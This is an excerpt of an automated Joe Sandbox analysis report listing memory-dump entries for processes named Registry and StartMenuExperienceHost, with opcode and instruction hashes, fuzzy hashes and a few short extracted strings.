                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ee54956b2644528aabe10f4ce4de9b01c621b0bd2145f3b887e5b8398a764e6
                  • Instruction ID: 7fc07d505599f1774148164cdcf153d2956f0e62349a5f6fca381bf268e67dec
                  • Opcode Fuzzy Hash: 8ee54956b2644528aabe10f4ce4de9b01c621b0bd2145f3b887e5b8398a764e6
                  • Instruction Fuzzy Hash: 3AF0B43081E78E8FD74A6B7088142B93BA0FF56205F4105BBE809C50E2EF389558D711
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 97fbde6e0bfeffbe77d6d3fe6a1139a95bf8508000276e2ac0dff82202465d31
                  • Instruction ID: c3471f4863d6c0da79474cc582d9c629a610208252d7f7d36ce516652f9f06ad
                  • Opcode Fuzzy Hash: 97fbde6e0bfeffbe77d6d3fe6a1139a95bf8508000276e2ac0dff82202465d31
                  • Instruction Fuzzy Hash: 15F01D30D0A5198FEB50EB14C944BEEB7F1EB98349F2041B6C409A32D5EF796E848B58
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction ID: e1dce635e0ff675f26569e857a6d6314a1830cb0c5a64790cf607449c2b3dbb6
                  • Opcode Fuzzy Hash: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction Fuzzy Hash: 51F0AC30908519CFEB95FB00CC54BE973A1FB95354F5085A9C44ED71A1EE7869888B58
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction ID: 07ada39ead5ff49ba8d57093d6e70542f6bdd2f4b496fdd8ad36e00915415d0c
                  • Opcode Fuzzy Hash: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction Fuzzy Hash: 8ED04235A1892DCFDF50EB98D8815EDB3B4FB59351F400126D51DD7181DB6468118B40
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: W_H
                  • API String ID: 0-126398842
                  • Opcode ID: cdbcc3c39e508760777ea6ba4d792aa2b4d56a3b8a58b12ef7014231e02dd8a0
                  • Instruction ID: 594aa74043678cecf723b22f2693bb2f2191d1e8cd9a7b129ab2570f203ed97d
                  • Opcode Fuzzy Hash: cdbcc3c39e508760777ea6ba4d792aa2b4d56a3b8a58b12ef7014231e02dd8a0
                  • Instruction Fuzzy Hash: 2D91CE71D1D94A8FE748EB6CE8697A9BFE1FF4A390F5000BAC009C72C6CF6819458B45
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: d190d8915767b396151e0a7c4b5e6f7f98c284f4696a1956bb970a0302253a61
                  • Instruction ID: c259a705623e1159004e3909a308824ea75082e60ebe228b6a688629983402e1
                  • Opcode Fuzzy Hash: d190d8915767b396151e0a7c4b5e6f7f98c284f4696a1956bb970a0302253a61
                  • Instruction Fuzzy Hash: 8421D13190D54A8FF745B77888492A97BE0EF46381F0404B7D41DD70D2EF38A8468365
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: edaf8dc2a7cc28fae707474f3d0a16e19e7c511362071307a8a08dc44f3aa395
                  • Instruction ID: 3cc869e202e9ca448496c3a467a0044b258a6787934fd7e11172a4b559c773bc
                  • Opcode Fuzzy Hash: edaf8dc2a7cc28fae707474f3d0a16e19e7c511362071307a8a08dc44f3aa395
                  • Instruction Fuzzy Hash: FB11B270D0D64E8FEB59EB6888592B97BE0FF5A351F0005BBE409D60D2EF259584C720
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 40b59579455f3efcb266574b66dc942f09c11f3829b677d613dd012b4a5f4436
                  • Instruction ID: d3cf586ee7232f5038e35c41edee613674ca39a7859611cdfad747b651495214
                  • Opcode Fuzzy Hash: 40b59579455f3efcb266574b66dc942f09c11f3829b677d613dd012b4a5f4436
                  • Instruction Fuzzy Hash: 6AF0FF30D0D64F8EEB98AB6898083FA77E0FF56251F00027BE809D20D0EF2451908210
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ac6a4e13f3d9ac8bbbc8e3b0fee9022836413410637e9b85385c2cffe6ddb59
                  • Instruction ID: 094af16c4de83afd10c963a8a2e5fe203df25220a0e8e71c11bd480cf32295f8
                  • Opcode Fuzzy Hash: 8ac6a4e13f3d9ac8bbbc8e3b0fee9022836413410637e9b85385c2cffe6ddb59
                  • Instruction Fuzzy Hash: 6E718D31A0CA4A8FDB48EF2898516B977E2FF99744F14457AE44DC32C6CF34A842C785
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 994c4daccbcbc2c50f4ba35a6f7ef625d42a5c8c07c0337cf581c358a8ea2b10
                  • Instruction ID: 3ad49f772646a160bcffa8ee5e4b76101a4b2567a62cb1b6a2eccb1aa62d1582
                  • Opcode Fuzzy Hash: 994c4daccbcbc2c50f4ba35a6f7ef625d42a5c8c07c0337cf581c358a8ea2b10
                  • Instruction Fuzzy Hash: 3451BE31A0CA5A8FDB48EF1888555BA77E2FB98750F14467EE44AC3285CF34E842CB85
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a98978fd44bed0dfddec34a89f880dea623d9e4aee24bbaa2fef74104accc24c
                  • Instruction ID: 47be1b40db59ed65a098bc0c145c7d05419134bd38b8f090a48ff8bcaf5aeba4
                  • Opcode Fuzzy Hash: a98978fd44bed0dfddec34a89f880dea623d9e4aee24bbaa2fef74104accc24c
                  • Instruction Fuzzy Hash: 98512270D086198FEB54EBA8E4986EDBBB1FF58341F54413AD009E72D2DB38A944CB18
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: def4a51ff039916f53f194718a3fcb32605dd9ec1b743ed0c0c6c84a857ddba9
                  • Instruction ID: 2aab9c4e90c376b263cda682e585b70f3b6b609009daa6b8ec7c77ce2f64a045
                  • Opcode Fuzzy Hash: def4a51ff039916f53f194718a3fcb32605dd9ec1b743ed0c0c6c84a857ddba9
                  • Instruction Fuzzy Hash: 1B31F2B1D0DD8A9FE745FB7998480A97BE0FF26390F0804BBC008C70D2EF2994858759
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d733ac5259effc36f97f1b6cbf364071137b8a9dbd185590599ceae00326d8ab
                  • Instruction ID: 8444e90d195afd9b5d1f1727e18243205c6d9ca2a041abe3effb03d5bdd519c2
                  • Opcode Fuzzy Hash: d733ac5259effc36f97f1b6cbf364071137b8a9dbd185590599ceae00326d8ab
                  • Instruction Fuzzy Hash: 5531F570D1852A9EEB94EF94D8547ECB6F1FF58341F1081BAD00DE2291DB7869848B58
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 011a1694953a6273003c26924eb9ef3e5f4e18fef7a406aa80f45b8d09905e14
                  • Instruction ID: 038e4865229366b0507c4c3b2b90232c1bed0fdc9f6f59331f2444c71c24b88b
                  • Opcode Fuzzy Hash: 011a1694953a6273003c26924eb9ef3e5f4e18fef7a406aa80f45b8d09905e14
                  • Instruction Fuzzy Hash: 5F215E70918A4D8FDB89EF28C489AED7BF0FF2C305F01056AE80AC7291DB34A591CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd